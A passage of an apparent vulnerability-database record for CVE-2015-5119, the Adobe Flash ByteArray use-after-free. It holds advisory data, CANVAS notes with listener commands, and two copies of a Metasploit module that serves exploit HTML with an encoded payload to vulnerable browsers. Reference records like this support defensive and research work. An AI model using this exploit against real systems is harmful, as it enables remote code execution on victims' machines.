vfork() in Safari sandbox.\n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "attackerkb", "title": "Adobe Flash ByteArray Use-After-Free", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-2161", "CVE-2015-5119"], "modified": "2020-02-13T00:00:00", "id": "AKB:BDC2BC7E-5904-4C44-80ED-E26E3BD1A1A6", "href": "https://attackerkb.com/topics/jLhkepp0Dv/adobe-flash-bytearray-use-after-free", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2016-12-05T22:11:30", "description": "", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "packetstorm", "title": "Adobe Flash Player ByteArray Use After Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T00:00:00", "id": "PACKETSTORM:132600", "href": "https://packetstormsecurity.com/files/132600/Adobe-Flash-Player-ByteArray-Use-After-Free.html", "sourceData": "`## \n# This module requires Metasploit: http://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::BrowserExploitServer \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'Adobe Flash Player ByteArray Use After Free', \n'Description' => %q{ \nThis module exploits an use after free on Adobe Flash Player. The vulnerability, \ndiscovered by Hacking Team and made public on its July 2015 data leak, was \ndescribed as an Use After Free while handling ByteArray objects. This module has \nbeen tested successfully on: \n \nWindows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, \nWindows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, \nWindows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, \nWindows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and \nLinux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468. \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Unknown', # Someone from HackingTeam \n'juan vazquez', # msf module \n'sinn3r' # msf module \n], \n'References' => \n[ \n['CVE', '2015-5119'], \n['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'], \n['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'], \n['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816'] \n], \n'Payload' => \n{ \n'DisableNops' => true \n}, \n'Platform' => ['win', 'linux'], \n'Arch' => [ARCH_X86], \n'BrowserRequirements' => \n{ \n:source => /script|headers/i, \n:arch => ARCH_X86, \n:os_name => lambda do |os| \nos =~ OperatingSystems::Match::LINUX || \nos =~ OperatingSystems::Match::WINDOWS_7 || \nos =~ OperatingSystems::Match::WINDOWS_81 || \nos =~ OperatingSystems::Match::WINDOWS_VISTA || \nos =~ OperatingSystems::Match::WINDOWS_XP \nend, \n:ua_name => lambda do |ua| \ncase target.name \nwhen 'Windows' \nreturn true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF \nwhen 'Linux' \nreturn true if ua == Msf::HttpClients::FF \nend \n \nfalse \nend, \n:flash => lambda do |ver| \ncase target.name \nwhen 'Windows' \n# Note: Chrome might be vague about the version. \n# Instead of 18.0.0.203, it just says 18.0 \nreturn true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194') \nwhen 'Linux' \nreturn true if ver =~ /^11\\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468') \nend \n \nfalse \nend \n}, \n'Targets' => \n[ \n[ 'Windows', \n{ \n'Platform' => 'win' \n} \n], \n[ 'Linux', \n{ \n'Platform' => 'linux' \n} \n] \n], \n'Privileged' => false, \n'DisclosureDate' => 'Jul 06 2015', \n'DefaultTarget' => 0)) \nend \n \ndef exploit \n@swf = create_swf \n \nsuper \nend \n \ndef on_request_exploit(cli, request, target_info) \nprint_status(\"Request: #{request.uri}\") \n \nif request.uri =~ /\\.swf$/ \nprint_status('Sending SWF...') \nsend_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'}) \nreturn \nend \n \nprint_status('Sending HTML...') \nsend_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'}) \nend \n \ndef exploit_template(cli, target_info) \nswf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\" \ntarget_payload = get_payload(cli, target_info) \nb64_payload = Rex::Text.encode_base64(target_payload) \nos_name = target_info[:os_name] \n \nif target.name =~ /Windows/ \nplatform_id = 'win' \nelsif target.name =~ /Linux/ \nplatform_id = 'linux' \nend \n \nhtml_template = %Q|<html> \n<body> \n<object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" /> \n<param name=\"movie\" value=\"<%=swf_random%>\" /> \n<param name=\"allowScriptAccess\" value=\"always\" /> \n<param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" /> \n<param name=\"Play\" value=\"true\" /> \n<embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>\" Play=\"true\"/> \n</object> \n</body> \n</html> \n| \n \nreturn html_template, binding() \nend \n \ndef create_swf \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf') \nswf = ::File.open(path, 'rb') { |f| swf = f.read } \n \nswf \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/132600/adobe_flash_hacking_team_uaf.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "canvas": [{"lastseen": "2021-07-28T14:33:28", "edition": 3, "description": "**Name**| adobe_flash_valueof \n---|--- \n**CVE**| CVE-2015-5119 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| adobe_flash_valueof \n**Notes**| CVE Name: CVE-2015-5119 \nVENDOR: Adobe \nNotes: \n \nTested on: \n\\- Windows 7 x86/x64 IE(32/64) 8, 9, 11 \n \nThis module exploits a use after free vulnerability on Adobe Flash Player. \nWhen you have a ByteArray object ba, and perform an assignment like this ba[0] = object, it will call this object's ValueOf function \nThe ValueOf function can be overridden, so someone can change value of ba in the object ValueOf function \nIf you reallocate the ba memory in the ValueOf function, it will cause a UAF because ba[0] = object will save the original memory and use it after ValueOf function has been called. \n \nIMPORTANT: \n \nYou need to setup a WIN64 MOSDEF INTEL listener in order for the callback \nprocess to work, as the InjectToSelf shellcode doesn't support Universal MOSDEF \nyet. \n \nUsage: \npython ./exploits/clientd/clientd.py -l 192.168.1.10 -d 5555 -O server_port:8080 -O allowed_attack_modules:adobe_flash_valueof -O auto_detect_exploits:0 \npython commandlineInterface.py -v 17 -p5555 \n \nVersionsAffected: Adobe Flash Player &gt; 9 and before 18.0.0.194 on Windows \nRepeatability: One-shot \nReferences: ['http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'] \nCVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5119 \n\n", "cvss3": {}, "published": "2015-07-08T14:59:00", "type": "canvas", "title": "Immunity Canvas: ADOBE_FLASH_VALUEOF", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2015-07-08T14:59:00", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/adobe_flash_valueof", "id": "ADOBE_FLASH_VALUEOF", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2022-03-23T12:52:57", "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.", "cvss3": {}, "published": "2015-07-08T14:59:00", "type": "cve", "title": "CVE-2015-5119", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-5119"], "modified": "2017-01-20T02:59:00", "cpe": ["cpe:/a:adobe:flash_player:14.0.0.125", "cpe:/a:adobe:flash_player:17.0.0.134", "cpe:/a:adobe:flash_player:16.0.0.287", "cpe:/a:adobe:flash_player:11.2.202.468", "cpe:/a:adobe:flash_player:15.0.0.152", "cpe:/a:adobe:flash_player:15.0.0.239", "cpe:/a:adobe:flash_player:18.0.0.161", "cpe:/a:adobe:flash_player:18.0.0.194", "cpe:/a:adobe:flash_player:14.0.0.145", "cpe:/a:adobe:flash_player:14.0.0.176", "cpe:/a:adobe:flash_player:17.0.0.188", "cpe:/a:adobe:flash_player:16.0.0.296", "cpe:/a:adobe:flash_player:13.0.0.292", "cpe:/a:adobe:flash_player:16.0.0.235", "cpe:/a:adobe:flash_player:15.0.0.246", "cpe:/a:adobe:flash_player:15.0.0.189", "cpe:/a:adobe:flash_player:15.0.0.223", "cpe:/a:adobe:flash_player:17.0.0.169", "cpe:/a:adobe:flash_player:15.0.0.167", "cpe:/a:adobe:flash_player:16.0.0.257", "cpe:/a:adobe:flash_player:14.0.0.179"], "id": "CVE-2015-5119", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5119", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:adobe:flash_player:15.0.0.152:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.235:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.188:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.167:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.161:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.223:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.257:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.296:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.239:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.134:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:17.0.0.169:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.179:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:13.0.0.292:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.189:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:16.0.0.287:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.145:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:11.2.202.468:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.176:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:15.0.0.246:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:18.0.0.194:*:*:*:*:*:*:*", "cpe:2.3:a:adobe:flash_player:14.0.0.125:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2022-06-24T09:38:46", "description": "This module exploits an use after free on Adobe Flash Player. The vulnerability, discovered by Hacking Team and made public as part of the July 2015 data leak, was described as an Use After Free while handling ByteArray objects. This module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194, Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\n", "cvss3": {}, "published": "2015-07-07T16:19:48", "type": "metasploit", "title": "Adobe Flash Player ByteArray Use After Free", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-5119"], "modified": "2021-02-25T16:47:49", "id": "MSF:EXPLOIT-MULTI-BROWSER-ADOBE_FLASH_HACKING_TEAM_UAF-", "href": "https://www.rapid7.com/db/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::BrowserExploitServer\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player ByteArray Use After Free',\n 'Description' => %q{\n This module exploits an use after free on Adobe Flash Player. The vulnerability,\n discovered by Hacking Team and made public as part of the July 2015 data leak, was\n described as an Use After Free while handling ByteArray objects. This module has\n been tested successfully on:\n\n Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), IE11 and Adobe Flash 18.0.0.194,\n Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194, and\n Linux Mint \"Rebecca\" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Someone from HackingTeam\n 'juan vazquez', # msf module\n 'sinn3r' # msf module\n ],\n 'References' =>\n [\n ['CVE', '2015-5119'],\n ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],\n ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],\n ['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']\n ],\n 'Payload' =>\n {\n 'DisableNops' => true\n },\n 'Platform' => ['win', 'linux'],\n 'Arch' => [ARCH_X86],\n 'BrowserRequirements' =>\n {\n :source => /script|headers/i,\n :arch => ARCH_X86,\n :os_name => lambda do |os|\n os =~ OperatingSystems::Match::LINUX ||\n os =~ OperatingSystems::Match::WINDOWS_7 ||\n os =~ OperatingSystems::Match::WINDOWS_81 ||\n os =~ OperatingSystems::Match::WINDOWS_VISTA ||\n os =~ OperatingSystems::Match::WINDOWS_XP\n end,\n :ua_name => lambda do |ua|\n case target.name\n when 'Windows'\n return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF\n when 'Linux'\n return true if ua == Msf::HttpClients::FF\n end\n\n false\n end,\n :flash => lambda do |ver|\n case target.name\n when 'Windows'\n return true if Rex::Version.new(ver) <= Rex::Version.new('18.0.0.194')\n when 'Linux'\n return true if ver =~ /^11\\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.468')\n end\n\n false\n end\n },\n 'Targets' =>\n [\n [ 'Windows',\n {\n 'Platform' => 'win'\n }\n ],\n [ 'Linux',\n {\n 'Platform' => 'linux'\n }\n ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => '2015-07-06',\n 'DefaultTarget' => 0,\n 'Notes' =>\n {\n 'AKA' => ['0DayFlush']\n }\n ))\n end\n\n def exploit\n @swf = create_swf\n\n super\n end\n\n def on_request_exploit(cli, request, target_info)\n print_status(\"Request: #{request.uri}\")\n\n if request.uri =~ /\\.swf$/\n print_status('Sending SWF...')\n send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})\n return\n end\n\n print_status('Sending HTML...')\n send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})\n end\n\n def exploit_template(cli, target_info)\n swf_random = \"#{rand_text_alpha(4 + rand(3))}.swf\"\n target_payload = get_payload(cli, target_info)\n b64_payload = Rex::Text.encode_base64(target_payload)\n\n if target.name =~ /Windows/\n platform_id = 'win'\n elsif target.name =~ /Linux/\n platform_id = 'linux'\n end\n\n html_template = %Q|<html>\n <body>\n <object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab\" width=\"1\" height=\"1\" />\n <param name=\"movie\" value=\"<%=swf_random%>\" />\n <param name=\"allowScriptAccess\" value=\"always\" />\n <param name=\"FlashVars\" value=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" />\n <param name=\"Play\" value=\"true\" />\n <embed type=\"application/x-shockwave-flash\" width=\"1\" height=\"1\" src=\"<%=swf_random%>\" allowScriptAccess=\"always\" FlashVars=\"sh=<%=b64_payload%>&pl=<%=platform_id%>\" Play=\"true\"/>\n </object>\n </body>\n </html>\n |\n\n return html_template, binding()\n end\n\n def create_swf\n path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')\n swf = ::File.open(path, 'rb') { |f| swf = f.read }\n\n swf\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "symantec": [{"lastseen": "2021-06-08T18:45:41", "description": "### Description\n\nAdobe Flash Player is prone to a remote memory-corruption vulnerability because of a use-after-free error. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected applications. Failed exploit attempts will likely cause a denial-of-service condition.\n\n### Technologies Affected\n\n * Adobe AIR 1.0 \n * Adobe AIR 1.0.1 \n * Adobe AIR 1.0.4990 \n * Adobe AIR 1.0.8.4990 \n * Adobe AIR 1.01 \n * Adobe AIR 1.1 \n * Adobe AIR 1.1.0.5790 \n * Adobe AIR 1.5 \n * Adobe AIR 1.5.0.7220 \n * Adobe AIR 1.5.1 \n * Adobe AIR 1.5.1.8210 \n * Adobe AIR 1.5.2 \n * Adobe AIR 1.5.3 \n * Adobe AIR 1.5.3.9120 \n * Adobe AIR 1.5.3.9130 \n * Adobe AIR 13.0.0.111 \n * Adobe AIR 13.0.0.83 \n * Adobe AIR 14.0.0.110 \n * Adobe AIR 14.0.0.137 \n * Adobe AIR 14.0.0.178 \n * Adobe AIR 14.0.0.179 \n * Adobe AIR 15.0.0.249 \n * Adobe AIR 15.0.0.252 \n * Adobe AIR 15.0.0.293 \n * Adobe AIR 15.0.0.356 \n * Adobe AIR 16.0.0.245 \n * Adobe AIR 16.0.0.272 \n * Adobe AIR 17.0.0.144 \n * Adobe AIR 17.0.0.172 \n * Adobe AIR 18.0.0.143 \n * Adobe AIR 18.0.0.144 \n * Adobe AIR 2.0.2 \n * Adobe AIR 2.0.2.12610 \n * Adobe AIR 2.0.3 \n * Adobe AIR 2.0.3.13070 \n * Adobe AIR 2.0.4 \n * Adobe AIR 2.5.0.16600 \n * Adobe AIR 2.5.1 \n * Adobe AIR 2.5.1.17730 \n * Adobe AIR 2.6 \n * Adobe AIR 2.6.0.19120 \n * Adobe AIR 2.6.0.19140 \n * Adobe AIR 2.6.19120 \n * Adobe AIR 2.6.19140 \n * Adobe AIR 2.7 \n * Adobe AIR 2.7.0.1948 \n * Adobe AIR 2.7.0.19480 \n * Adobe AIR 2.7.0.1953 \n * Adobe AIR 2.7.0.19530 \n * Adobe AIR 2.7.1 \n * Adobe AIR 2.7.1.1961 \n * Adobe AIR 2.7.1.19610 \n * Adobe AIR 3.0 \n * Adobe AIR 3.0.0.408 \n * Adobe AIR 3.0.0.4080 \n * Adobe AIR 3.1.0.485 \n * Adobe AIR 3.1.0.488 \n * Adobe AIR 3.1.0.4880 \n * Adobe AIR 3.2.0.207 \n * Adobe AIR 3.2.0.2070 \n * Adobe AIR 3.2.0.2080 \n * Adobe AIR 3.3.0.3610 \n * Adobe AIR 3.3.0.3670 \n * Adobe AIR 3.3.0.3690 \n * Adobe AIR 3.4.0.2540 \n * Adobe AIR 3.4.0.2710 \n * Adobe AIR 3.5.0.1060 \n * Adobe AIR 3.5.0.600 \n * Adobe AIR 3.5.0.880 \n * Adobe AIR 3.5.0.890 \n * Adobe AIR 3.6.0.597 \n * Adobe AIR 3.6.0.599 \n * Adobe AIR 3.6.0.6090 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1530 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1660 \n * Adobe AIR 3.7.0.1860 \n * Adobe AIR 3.7.0.2090 \n * Adobe AIR 3.7.0.2100 \n * Adobe AIR 3.8.0.1430 \n * Adobe AIR 3.8.0.870 \n * Adobe AIR 3.8.0.910 \n * Adobe AIR 3.9.0.1060 \n * Adobe AIR 3.9.0.1210 \n * Adobe AIR 3.9.0.1380 \n * Adobe AIR 4 \n * Adobe AIR 4.0.0.1390 \n * Adobe AIR 4.0.0.1390 SDK \n * Adobe AIR 4.0.0.1628 \n * Adobe AIR SDK 13.0.0.111 \n * Adobe AIR SDK 13.0.0.83 \n * Adobe AIR SDK 14.0.0.110 \n * Adobe AIR SDK 14.0.0.137 \n * Adobe AIR SDK 14.0.0.178 \n * Adobe AIR SDK 14.0.0.179 \n * Adobe AIR SDK 15.0.0.249 \n * Adobe AIR SDK 15.0.0.302 \n * Adobe AIR SDK 15.0.0.356 \n * Adobe AIR SDK 16.0.0.272 \n * Adobe AIR SDK 17.0.0.144 \n * Adobe AIR SDK 17.0.0.172 \n * Adobe AIR SDK 18.0.0.143 \n * Adobe AIR SDK 18.0.0.144 \n * Adobe AIR SDK 3.9.0.1380 \n * Adobe AIR SDK 4.0.0.1390 \n * Adobe Flash Player 10 \n * Adobe Flash Player 10.0.0.584 \n * Adobe Flash Player 10.0.12 .35 \n * Adobe Flash Player 10.0.12 .36 \n * Adobe Flash Player 10.0.12.10 \n * Adobe Flash Player 10.0.15 .3 \n * Adobe Flash Player 10.0.2.54 \n * Adobe Flash Player 10.0.22.87 \n * Adobe Flash Player 10.0.32 18 \n * Adobe Flash Player 10.0.32.18 \n * Adobe Flash Player 10.0.42.34 \n * Adobe Flash Player 10.0.45 2 \n * Adobe Flash Player 10.1 \n * Adobe Flash Player 10.1.102.64 \n * Adobe Flash Player 10.1.102.65 \n * Adobe Flash Player 10.1.105.6 \n * Adobe Flash Player 10.1.106.16 \n * Adobe Flash Player 10.1.106.17 \n * Adobe Flash Player 10.1.51.66 \n * Adobe Flash Player 10.1.52.14 \n * Adobe Flash Player 10.1.52.14.1 \n * Adobe Flash Player 10.1.52.15 \n * Adobe Flash Player 10.1.53.64 \n * Adobe Flash Player 10.1.82.76 \n * Adobe Flash Player 10.1.85.3 \n * Adobe Flash Player 10.1.92.10 \n * Adobe Flash Player 10.1.92.8 \n * Adobe Flash Player 10.1.95.1 \n * Adobe Flash Player 10.1.95.2 \n * Adobe Flash Player 10.2.152 \n * Adobe Flash Player 10.2.152.21 \n * Adobe Flash Player 10.2.152.26 \n * Adobe Flash Player 10.2.152.32 \n * Adobe Flash Player 10.2.152.33 \n * Adobe Flash Player 10.2.153.1 \n * Adobe Flash Player 10.2.154.13 \n * Adobe Flash Player 10.2.154.18 \n * Adobe Flash Player 10.2.154.24 \n * Adobe Flash Player 10.2.154.25 \n * Adobe Flash Player 10.2.154.27 \n * Adobe Flash Player 10.2.154.28 \n * Adobe Flash Player 10.2.156.12 \n * Adobe Flash Player 10.2.157.51 \n * Adobe Flash Player 10.2.159.1 \n * Adobe Flash Player 10.3.181.14 \n * Adobe Flash Player 10.3.181.16 \n * Adobe Flash Player 10.3.181.22 \n * Adobe Flash Player 10.3.181.23 \n * Adobe Flash Player 10.3.181.26 \n * Adobe Flash Player 10.3.181.34 \n * Adobe Flash Player 10.3.183.10 \n * Adobe Flash Player 10.3.183.11 \n * Adobe Flash Player 10.3.183.15 \n * Adobe Flash Player 10.3.183.16 \n * Adobe Flash Player 10.3.183.19 \n * Adobe Flash Player 10.3.183.20 \n * Adobe Flash Player 10.3.183.23 \n * Adobe Flash Player 10.3.183.25 \n * Adobe Flash Player 10.3.183.29 \n * Adobe Flash Player 10.3.183.4 \n * Adobe Flash Player 10.3.183.43 \n * Adobe Flash Player 10.3.183.48 \n * Adobe Flash Player 10.3.183.5 \n * Adobe Flash Player 10.3.183.50 \n * Adobe Flash Player 10.3.183.51 \n * Adobe Flash Player 10.3.183.61 \n * Adobe Flash Player 10.3.183.63 \n * Adobe Flash Player 10.3.183.67 \n * Adobe Flash Player 10.3.183.68 \n * Adobe Flash Player 10.3.183.7 \n * Adobe Flash Player 10.3.183.75 \n * Adobe Flash Player 10.3.183.86 \n * Adobe Flash Player 10.3.185.21 \n * Adobe Flash Player 10.3.185.22 \n * Adobe Flash Player 10.3.185.23 \n * Adobe Flash Player 10.3.185.24 \n * Adobe Flash Player 10.3.185.25 \n * Adobe Flash Player 10.3.186.2 \n * Adobe Flash Player 10.3.186.3 \n * Adobe Flash Player 10.3.186.6 \n * Adobe Flash Player 10.3.186.7 \n * Adobe Flash Player 11 \n * Adobe Flash Player 11.0 \n * Adobe Flash Player 11.0.1.129 \n * Adobe Flash Player 11.0.1.152 \n * Adobe Flash Player 11.0.1.153 \n * Adobe Flash Player 11.0.1.60 \n * Adobe Flash Player 11.0.1.98 \n * Adobe Flash Player 11.1 \n * Adobe Flash Player 11.1.102.228 \n * Adobe Flash Player 11.1.102.55 \n * Adobe Flash Player 11.1.102.59 \n * Adobe Flash Player 11.1.102.62 \n * Adobe Flash Player 11.1.102.63 \n * Adobe Flash Player 11.1.111.10 \n * Adobe Flash Player 11.1.111.44 \n * Adobe Flash Player 11.1.111.5 \n * Adobe Flash Player 11.1.111.50 \n * Adobe Flash Player 11.1.111.54 \n * Adobe Flash Player 11.1.111.6 \n * Adobe Flash Player 11.1.111.64 \n * Adobe Flash Player 11.1.111.7 \n * Adobe Flash Player 11.1.111.73 \n * Adobe Flash Player 11.1.111.8 \n * Adobe Flash Player 11.1.111.9 \n * Adobe Flash Player 11.1.112.61 \n * Adobe Flash Player 11.1.115.11 \n * Adobe Flash Player 11.1.115.34 \n * Adobe Flash Player 11.1.115.48 \n * Adobe Flash Player 11.1.115.54 \n * Adobe Flash Player 11.1.115.58 \n * Adobe Flash Player 11.1.115.59 \n * Adobe Flash Player 11.1.115.6 \n * Adobe Flash Player 11.1.115.63 \n * Adobe Flash Player 11.1.115.69 \n * Adobe Flash Player 11.1.115.7 \n * Adobe Flash Player 11.1.115.8 \n * Adobe Flash Player 11.1.115.81 \n * Adobe Flash Player 11.2.202 238 \n * Adobe Flash Player 11.2.202.160 \n * Adobe Flash Player 11.2.202.197 \n * Adobe Flash Player 11.2.202.221 \n * Adobe Flash Player 11.2.202.223 \n * Adobe Flash Player 11.2.202.229 \n * Adobe Flash Player 11.2.202.233 \n * Adobe Flash Player 11.2.202.235 \n * Adobe Flash Player 11.2.202.236 \n * Adobe Flash Player 11.2.202.238 \n * Adobe Flash Player 11.2.202.243 \n * Adobe Flash Player 11.2.202.251 \n * Adobe Flash Player 11.2.202.258 \n * Adobe Flash Player 11.2.202.261 \n * Adobe Flash Player 11.2.202.262 \n * Adobe Flash Player 11.2.202.270 \n * Adobe Flash Player 11.2.202.273 \n * Adobe Flash Player 11.2.202.275 \n * Adobe Flash Player 11.2.202.280 \n * Adobe Flash Player 11.2.202.285 \n * Adobe Flash Player 11.2.202.291 \n * Adobe Flash Player 11.2.202.297 \n * Adobe Flash Player 11.2.202.310 \n * Adobe Flash Player 11.2.202.327 \n * Adobe Flash Player 11.2.202.332 \n * Adobe Flash Player 11.2.202.335 \n * Adobe Flash Player 11.2.202.336 \n * Adobe Flash Player 11.2.202.341 \n * Adobe Flash Player 11.2.202.346 \n * Adobe Flash Player 11.2.202.350 \n * Adobe Flash Player 11.2.202.356 \n * Adobe Flash Player 11.2.202.359 \n * Adobe Flash Player 11.2.202.378 \n * Adobe Flash Player 11.2.202.394 \n * Adobe Flash Player 11.2.202.400 \n * Adobe Flash 